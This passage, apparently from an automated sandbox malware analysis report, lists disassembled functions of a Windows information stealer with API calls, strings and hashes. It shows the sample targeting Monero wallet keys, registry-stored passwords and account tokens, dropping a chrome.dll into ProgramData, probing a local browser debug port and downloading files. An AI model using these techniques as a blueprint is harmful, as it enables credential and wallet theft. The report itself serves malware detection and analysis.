                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 3240024479-1526165396
                                    • Opcode ID: fd6a3a446d6461f8602ce40f78ac26d6bcfa37c03c317b43934defe27e1d990b
                                    • Instruction ID: ddad0fb03dd78f76f5f1267aa8726b4b521d5d80df8cb2d3edc2963eb3507179
                                    • Opcode Fuzzy Hash: fd6a3a446d6461f8602ce40f78ac26d6bcfa37c03c317b43934defe27e1d990b
                                    • Instruction Fuzzy Hash: 6D512078A10109EBCB58FFB0CDA6AED7779AF22340F904458F50A67591EF306B44CB62
                                    APIs
                                      • Part of subcall function 001912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001912B4
                                      • Part of subcall function 001912A0: RtlAllocateHeap.NTDLL(00000000), ref: 001912BB
                                      • Part of subcall function 001912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001912D7
                                      • Part of subcall function 001912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001912F5
                                      • Part of subcall function 001912A0: RegCloseKey.ADVAPI32(?), ref: 001912FF
                                    • lstrcat.KERNEL32(?,00000000), ref: 0019134F
                                    • lstrlen.KERNEL32(?), ref: 0019135C
                                    • lstrcat.KERNEL32(?,.keys), ref: 00191377
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00191465
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                    • DeleteFileA.KERNEL32(00000000), ref: 001914EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                    • API String ID: 3478931302-218353709
                                    • Opcode ID: 3387f5a36f9521f2e94d3c5812f27051f64ab7f4320876d93a30ed11086d172a
                                    • Instruction ID: a4c47b9bf941b36a23f3690bea87087a25a8c772f0bc2595b56e72d1a30fb2bf
                                    • Opcode Fuzzy Hash: 3387f5a36f9521f2e94d3c5812f27051f64ab7f4320876d93a30ed11086d172a
                                    • Instruction Fuzzy Hash: 875163B5D502195BCB55FB60DC92FED737C9F65300F8045E8B60A62092EF706B88CBA6
                                    APIs
                                    • InternetOpenA.WININET(001B0AF6,00000001,00000000,00000000,00000000), ref: 00199A6A
                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00199AAB
                                    • InternetCloseHandle.WININET(00000000), ref: 00199AC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$Open$CloseHandle
                                    • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                    • API String ID: 3289985339-2144369209
                                    • Opcode ID: d5f98675626f8795f7c51c8854a22b35bf1a2cbcceeec875ea763f21e1080e86
                                    • Instruction ID: f0dd6b44f6f2edd7f43657a48c1a8e1c846a04a926d8652c89f6c89fe7eeb1e9
                                    • Opcode Fuzzy Hash: d5f98675626f8795f7c51c8854a22b35bf1a2cbcceeec875ea763f21e1080e86
                                    • Instruction Fuzzy Hash: 37413A75A50258AFCF14EFA4CC95FDD7778BB58740F104099F50AAB290DBB4AE80CB64
                                    APIs
                                      • Part of subcall function 00197330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0019739A
                                      • Part of subcall function 00197330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00197411
                                      • Part of subcall function 00197330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0019746D
                                      • Part of subcall function 00197330: GetProcessHeap.KERNEL32(00000000,?), ref: 001974B2
                                      • Part of subcall function 00197330: HeapFree.KERNEL32(00000000), ref: 001974B9
                                    • lstrcat.KERNEL32(00000000,001B192C), ref: 00197666
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001976A8
                                    • lstrcat.KERNEL32(00000000, : ), ref: 001976BA
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001976EF
                                    • lstrcat.KERNEL32(00000000,001B1934), ref: 00197700
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00197733
                                    • lstrcat.KERNEL32(00000000,001B1938), ref: 0019774D
                                    • task.LIBCPMTD ref: 0019775B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                    • String ID: :
                                    • API String ID: 2677904052-3653984579
                                    • Opcode ID: 1e01fa9959f01f34a4b010a292319185e77bb6cfeb2dbba66a26344271b7db2f
                                    • Instruction ID: d601b538ade5cdcb3209326ab72967fa3844c947bc537363ed71e6a2b9258a83
                                    • Opcode Fuzzy Hash: 1e01fa9959f01f34a4b010a292319185e77bb6cfeb2dbba66a26344271b7db2f
                                    • Instruction Fuzzy Hash: 5E317E75A04108EFDF08EBE0DCA5DFF7379AF55305B504128F106A32A0EB74A946CBA6
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 00194800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00194889
                                      • Part of subcall function 00194800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00194899
                                    • InternetOpenA.WININET(001B0DFB,00000001,00000000,00000000,00000000), ref: 0019615F
                                    • StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 001961DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00196203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0019622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0019625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00196299
                                    • InternetCloseHandle.WININET(?), ref: 001962A3
                                    • InternetCloseHandle.WININET(00000000), ref: 001962B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: cdf7f58ec24b3e4fb7fa2f731f702f33eae26fe376975d4026efa36d2692b5ad
                                    • Instruction ID: a878187e4fb60d99496d05922ba0fee41f3ee7c4e290024e3b37f04ad04b913e
                                    • Opcode Fuzzy Hash: cdf7f58ec24b3e4fb7fa2f731f702f33eae26fe376975d4026efa36d2692b5ad
                                    • Instruction Fuzzy Hash: D25196B1A40208ABDF24DF90CC45FEE7779AF45305F4081A9F605A71C0DBB4AA89CFA5
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 0021024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0021035B
                                    • CatchIt.LIBVCRUNTIME ref: 002103AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 002104C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: 3e9a569b51d601ff844a128911beacc62036817a6296a05f8afda65f1f07c06d
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: E6B17C7182020AEFCF25EFA4C9C19EEB7B5BF24310B14415AE9156B252D7B0DAE1CF91
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0019739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00197411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0019746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 001974B2
                                    • HeapFree.KERNEL32(00000000), ref: 001974B9
                                    • task.LIBCPMTD ref: 001975B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: 9f3e89a4b050e332f58d0894ad659defe754c2e3437e241792bce10597eeafad
                                    • Instruction ID: e435d6b2c2ba23c30671dcfd751d055699212914f39e520af618bd757b6547c3
                                    • Opcode Fuzzy Hash: 9f3e89a4b050e332f58d0894ad659defe754c2e3437e241792bce10597eeafad
                                    • Instruction Fuzzy Hash: FC613BB59141689BDF24DB50CC51BDAB7B8BF58304F0081E9E649A6181EFB06FC9CFA1
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,00E2DD08,00000000,00020119,?), ref: 001A4344
                                    • RegQueryValueExA.ADVAPI32(?,00E2E668,00000000,00000000,00000000,000000FF), ref: 001A4368
                                    • RegCloseKey.ADVAPI32(?), ref: 001A4372
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A4397
                                    • lstrcat.KERNEL32(?,00E2E680), ref: 001A43AB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID: h$x
                                    • API String ID: 690832082-1467089736
                                    • Opcode ID: f74ed96c5e47721c065bdb3a96a07452ebbd72ea5af0fc22d19d14e9bab8c6ff
                                    • Instruction ID: 5f643882207a73cb6cd665166776f0bf963e2fa0530b4180f598ed93c7f6c2ce
                                    • Opcode Fuzzy Hash: f74ed96c5e47721c065bdb3a96a07452ebbd72ea5af0fc22d19d14e9bab8c6ff
                                    • Instruction Fuzzy Hash: A44198B6900108BBDF14EBA0EC56FEE733DAB99700F404568F71556181FBB55A888BE2
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001A7834
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A783B
                                    • RegOpenKeyExA.ADVAPI32(80000002,00E1B770,00000000,00020119,00000000), ref: 001A786D
                                    • RegQueryValueExA.ADVAPI32(00000000,00E2E3E0,00000000,00000000,?,000000FF), ref: 001A788E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A7898
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: Windows 11$
                                    • API String ID: 3225020163-442948342
                                    • Opcode ID: fc262d6d65a10e21136244a94961cdc5bddd13fcf33fd846ed2a4d8c4813631c
                                    • Instruction ID: 54ae30089317973c07cbef6b0d4a1227df0077c4ac4cc3e65889f5232f4fb75e
                                    • Opcode Fuzzy Hash: fc262d6d65a10e21136244a94961cdc5bddd13fcf33fd846ed2a4d8c4813631c
                                    • Instruction Fuzzy Hash: 13016279A08305BBEB00DBE4DD59FAE7778EB49B04F0041A9FA04E7280E7B49A00CB55
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • lstrlen.KERNEL32(00000000), ref: 0019BC6F
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0019BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 0019BD75
                                    • lstrlen.KERNEL32(00000000), ref: 0019BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: fd93b1a5a5bcb453e68406a543787ea03103185b3a029e3ce18c4098d04bf3dd
                                    • Instruction ID: 5f1d05b247e9bc57be89902df35014d914ec5b77d09630ac702014a9f3a54153
                                    • Opcode Fuzzy Hash: fd93b1a5a5bcb453e68406a543787ea03103185b3a029e3ce18c4098d04bf3dd
                                    • Instruction Fuzzy Hash: 57B16076910208ABCF54FBA0DDA6EEE7379AF65304F804568F50663191EF346A48CB72
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: ff5df5c030229bfca69272136a85b6d2ff6c745b3d95e51d0a02742f6d863976
                                    • Instruction ID: e4d68bdf5ef5e433867da7e46e1b563409cae51dbc2eb06c0abc2a99120c1893
                                    • Opcode Fuzzy Hash: ff5df5c030229bfca69272136a85b6d2ff6c745b3d95e51d0a02742f6d863976
                                    • Instruction Fuzzy Hash: D4F0823190C209EFD3449FE1EC0979CBBB0EB0670BF1141A6F61A97290E6B84A80DB56
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,001A08DC,C:\ProgramData\chrome.dll), ref: 001A9871
                                      • Part of subcall function 0019A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0019A098
                                    • StrCmpCA.SHLWAPI(00000000,00E28F30), ref: 001A0922
                                    • StrCmpCA.SHLWAPI(00000000,00E29080), ref: 001A0B79
                                    • StrCmpCA.SHLWAPI(00000000,00E290C0), ref: 001A0A0C
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 001A0C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 001A0C30
                                    • C:\ProgramData\chrome.dll, xrefs: 001A08CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: a3bb374323a1f743d38ebe04cd1108ca8decff69a893ced510610513704fd8c8
                                    • Instruction ID: 1d8669576ccd9df144d04a2def7a4e6801621d5a3d0074d4467410cf124e87a7
                                    • Opcode Fuzzy Hash: a3bb374323a1f743d38ebe04cd1108ca8decff69a893ced510610513704fd8c8
                                    • Instruction Fuzzy Hash: 99A176757002089FCF28EF64D996EED77BAAF95300F50856DE40A9F251EB30DA05CB92
                                    APIs
                                      • Part of subcall function 001A8CF0: GetSystemTime.KERNEL32(001B0E1B,00E2AB38,001B05B6,?,?,001913F9,?,0000001A,001B0E1B,00000000,?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001A8D16
                                    • wsprintfA.USER32 ref: 00199E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00199F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00199F17
                                    • lstrcat.KERNEL32(00000000,001B12D8), ref: 00199F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00199F7C
                                    • Sleep.KERNEL32(00001388), ref: 0019A013
                                      • Part of subcall function 001A99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A99C5
                                      • Part of subcall function 001A99A0: Process32First.KERNEL32(0019A056,00000128), ref: 001A99D9
                                      • Part of subcall function 001A99A0: Process32Next.KERNEL32(0019A056,00000128), ref: 001A99F2
                                      • Part of subcall function 001A99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 001A9A4E
                                      • Part of subcall function 001A99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 001A9A6C
                                      • Part of subcall function 001A99A0: CloseHandle.KERNEL32(00000000), ref: 001A9A79
                                      • Part of subcall function 001A99A0: CloseHandle.KERNEL32(0019A056), ref: 001A9A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: 9136fbadb7a1a96f22a6bd35fcbe6d1f637c1f79373019b685dd894fc69f3954
                                    • Instruction ID: 1536a6a9748e6c66b1ce7da7e73394015beb906b49d4a79fac975095b5ae3dca
                                    • Opcode Fuzzy Hash: 9136fbadb7a1a96f22a6bd35fcbe6d1f637c1f79373019b685dd894fc69f3954
                                    • Instruction Fuzzy Hash: 7C5196B5944308ABEB20DB60DC46FDA7378AF55704F004598F60DAB2C1EB75AB84CF55
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 0020FA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0020FA27
                                    • _ValidateLocalCookies.LIBCMT ref: 0020FAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0020FADB
                                    • _ValidateLocalCookies.LIBCMT ref: 0020FB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: b81f647ec6f2a97b4f577288ae448326794c7e6d30b079ba4cd9e42da3d42ca5
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: 5041C530A20309DFCF60DF68C980A9D7BB5BF49324F148165E818AB793D7719961CF91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0019501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00195021
                                    • InternetOpenA.WININET(001B0DE3,00000000,00000000,00000000,00000000), ref: 0019503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00195061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00195091
                                    • InternetCloseHandle.WININET(?), ref: 00195109
                                    • InternetCloseHandle.WININET(?), ref: 00195116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                    • String ID:
                                    • API String ID: 3066467675-0
                                    • Opcode ID: efd2f317ff832b2768f90f87b80c170ec23fe01bdbdfe8cffd6314096e30223e
                                    • Instruction ID: c2564f54546033a212dd082d2135b0f15afd63b02a5e62f2aa098b237bd0ea61
                                    • Opcode Fuzzy Hash: efd2f317ff832b2768f90f87b80c170ec23fe01bdbdfe8cffd6314096e30223e
                                    • Instruction Fuzzy Hash: 593118B4A40218ABDB24CF54CC85BDCB7B5AB48304F1081E9FA09A7280D7B06EC58F99
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E2E560,00000000,?,001B0E14,00000000,?,00000000), ref: 001A82C0
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 001A82C7
                                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001A82E8
                                    • wsprintfA.USER32 ref: 001A833C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                    • String ID: %d MB$@
                                    • API String ID: 2922868504-3474575989
                                    • Opcode ID: e83216907a5e4acf3d672ab18926580dcacde1ba317adc92fdde50cfc48c9253
                                    • Instruction ID: 0d9d704777dc0e4a504708e1f2dfc944404e5f26e77d9af589651dabb4a9c364
                                    • Opcode Fuzzy Hash: e83216907a5e4acf3d672ab18926580dcacde1ba317adc92fdde50cfc48c9253
                                    • Instruction Fuzzy Hash: AA214AB1E44208ABDB00DFD5DC49FAEBBB8FB45B04F104519F605BB280D7B899008BA9
                                    APIs
                                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001A85B6
                                    • wsprintfA.USER32 ref: 001A85E9
                                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001A860B
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A861C
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A8629
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                    • RegQueryValueExA.ADVAPI32(00000000,00E2E470,00000000,000F003F,?,00000400), ref: 001A867C
                                    • lstrlen.KERNEL32(?), ref: 001A8691
                                    • RegQueryValueExA.ADVAPI32(00000000,00E2E4E8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001B0B3C), ref: 001A8729
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A8798
                                    • RegCloseKey.ADVAPI32(00000000), ref: 001A87AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                    • String ID: %s\%s
                                    • API String ID: 3896182533-4073750446
